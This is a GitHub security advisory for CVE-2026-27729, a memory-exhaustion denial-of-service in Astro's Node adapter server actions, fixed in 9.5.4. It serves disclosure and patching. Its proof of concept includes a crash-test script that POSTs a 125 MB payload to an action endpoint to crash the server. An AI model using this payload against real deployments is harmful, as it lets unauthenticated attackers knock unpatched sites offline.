GHSA-JM64-8M5Q-4QH8
Vulnerability from github – Published: 2026-02-25 22:33 – Updated: 2026-02-25 22:33
VLAI?
Summary
Astro has memory exhaustion DoS due to missing request body size limit in Server Actions
Details
Summary
Astro server actions have no default request body size limit, which can lead to memory exhaustion DoS. A single large POST to a valid action endpoint can crash the server process on memory-constrained deployments.
Details
On-demand rendered sites built with Astro can define server actions, which automatically parse incoming request bodies (JSON or FormData). The body is buffered entirely into memory with no size limit — a single oversized request is sufficient to exhaust the process heap and crash the server.
Astro's Node adapter (mode: 'standalone') creates an HTTP server with no body size protection. In containerized environments, the crashed process is automatically restarted, and repeated requests cause a persistent crash-restart loop.
Action names are discoverable from HTML form attributes on any public page, so no authentication is required.
PoC
### Setup Create a new Astro project with the following files: `package.json`:{
"name": "poc-dos",
"private": true,
"scripts": {
"build": "astro build",
"start:128mb": "node --max-old-space-size=128 dist/server/entry.mjs"
},
"dependencies": {
"astro": "5.17.2",
"@astrojs/node": "9.5.3"
}
}
import { defineConfig } from 'astro/config';
import node from '@astrojs/node';
export default defineConfig({
output: 'server',
adapter: node({ mode: 'standalone' }),
});
import { defineAction } from 'astro:actions';
import { z } from 'astro:schema';
export const server = {
echo: defineAction({
input: z.object({ data: z.string() }),
handler: async (input) => ({ received: input.data.length }),
}),
};
---
---
<html><body><p>Server running</p></body></html>
const payload = JSON.stringify({ data: 'A'.repeat(125 * 1024 * 1024) });
console.log('Sending 125 MB payload...');
try {
const res = await fetch('http://localhost:4321/_actions/echo', {
method: 'POST',
headers: { 'Content-Type': 'application/json', 'Accept': 'application/json' },
body: payload,
});
console.log('Status:', res.status);
} catch (e) {
console.log('Server crashed:', e.message);
}
npm install && npm run build
# Terminal 1: Start server with 128 MB memory limit
npm run start:128mb
# Terminal 2: Send 125 MB payload
node crash-test.mjs
Impact
Allows unauthenticated denial of service against SSR standalone deployments using server actions. A single oversized request crashes the server process, and repeated requests cause a persistent crash-restart loop in containerized environments.
Severity ?
5.9 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@astrojs/node"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.0"
},
{
"fixed": "9.5.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27729"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-25T22:33:13Z",
"nvd_published_at": "2026-02-24T01:16:15Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nAstro server actions have no default request body size limit, which can lead to memory exhaustion DoS. A single large POST to a valid action endpoint can crash the server process on memory-constrained deployments.\n\n## Details\n\nOn-demand rendered sites built with Astro can define server actions, which automatically parse incoming request bodies (JSON or FormData). The body is buffered entirely into memory with no size limit \u2014 a single oversized request is sufficient to exhaust the process heap and crash the server.\n\nAstro\u0027s Node adapter (`mode: \u0027standalone\u0027`) creates an HTTP server with no body size protection. In containerized environments, the crashed process is automatically restarted, and repeated requests cause a persistent crash-restart loop.\n\nAction names are discoverable from HTML form attributes on any public page, so no authentication is required.\n\n## PoC\n\n\u003cdetails\u003e\n\n### Setup\n\nCreate a new Astro project with the following files:\n\n`package.json`:\n```json\n{\n \"name\": \"poc-dos\",\n \"private\": true,\n \"scripts\": {\n \"build\": \"astro build\",\n \"start:128mb\": \"node --max-old-space-size=128 dist/server/entry.mjs\"\n },\n \"dependencies\": {\n \"astro\": \"5.17.2\",\n \"@astrojs/node\": \"9.5.3\"\n }\n}\n```\n\n`astro.config.mjs`:\n```javascript\nimport { defineConfig } from \u0027astro/config\u0027;\nimport node from \u0027@astrojs/node\u0027;\n\nexport default defineConfig({\n output: \u0027server\u0027,\n adapter: node({ mode: \u0027standalone\u0027 }),\n});\n```\n\n`src/actions/index.ts`:\n```typescript\nimport { defineAction } from \u0027astro:actions\u0027;\nimport { z } from \u0027astro:schema\u0027;\n\nexport const server = {\n echo: defineAction({\n input: z.object({ data: z.string() }),\n handler: async (input) =\u003e ({ received: input.data.length }),\n }),\n};\n```\n\n`src/pages/index.astro`:\n```astro\n---\n---\n\u003chtml\u003e\u003cbody\u003e\u003cp\u003eServer running\u003c/p\u003e\u003c/body\u003e\u003c/html\u003e\n```\n\n`crash-test.mjs`:\n```javascript\nconst payload = JSON.stringify({ data: \u0027A\u0027.repeat(125 * 1024 * 1024) });\n\nconsole.log(\u0027Sending 125 MB payload...\u0027);\ntry {\n const res = await fetch(\u0027http://localhost:4321/_actions/echo\u0027, {\n method: \u0027POST\u0027,\n headers: { \u0027Content-Type\u0027: \u0027application/json\u0027, \u0027Accept\u0027: \u0027application/json\u0027 },\n body: payload,\n });\n console.log(\u0027Status:\u0027, res.status);\n} catch (e) {\n console.log(\u0027Server crashed:\u0027, e.message);\n}\n```\n\n### Reproduction\n\n```bash\nnpm install \u0026\u0026 npm run build\n\n# Terminal 1: Start server with 128 MB memory limit\nnpm run start:128mb\n\n# Terminal 2: Send 125 MB payload\nnode crash-test.mjs\n```\n\nThe server process crashes with `FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory`. The payload is buffered entirely into memory before any validation, exceeding the 128 MB heap limit.\n\n\u003c/details\u003e\n\n## Impact\n\nAllows unauthenticated denial of service against SSR standalone deployments using server actions. A single oversized request crashes the server process, and repeated requests cause a persistent crash-restart loop in containerized environments.",
"id": "GHSA-jm64-8m5q-4qh8",
"modified": "2026-02-25T22:33:14Z",
"published": "2026-02-25T22:33:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/withastro/astro/security/advisories/GHSA-jm64-8m5q-4qh8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27729"
},
{
"type": "WEB",
"url": "https://github.com/withastro/astro/pull/15564"
},
{
"type": "WEB",
"url": "https://github.com/withastro/astro/commit/522f880b07a4ea7d69a19b5507fb53a5ed6c87f8"
},
{
"type": "PACKAGE",
"url": "https://github.com/withastro/astro"
},
{
"type": "WEB",
"url": "https://github.com/withastro/astro/releases/tag/@astrojs/node@9.5.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Astro has memory exhaustion DoS due to missing request body size limit in Server Actions"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…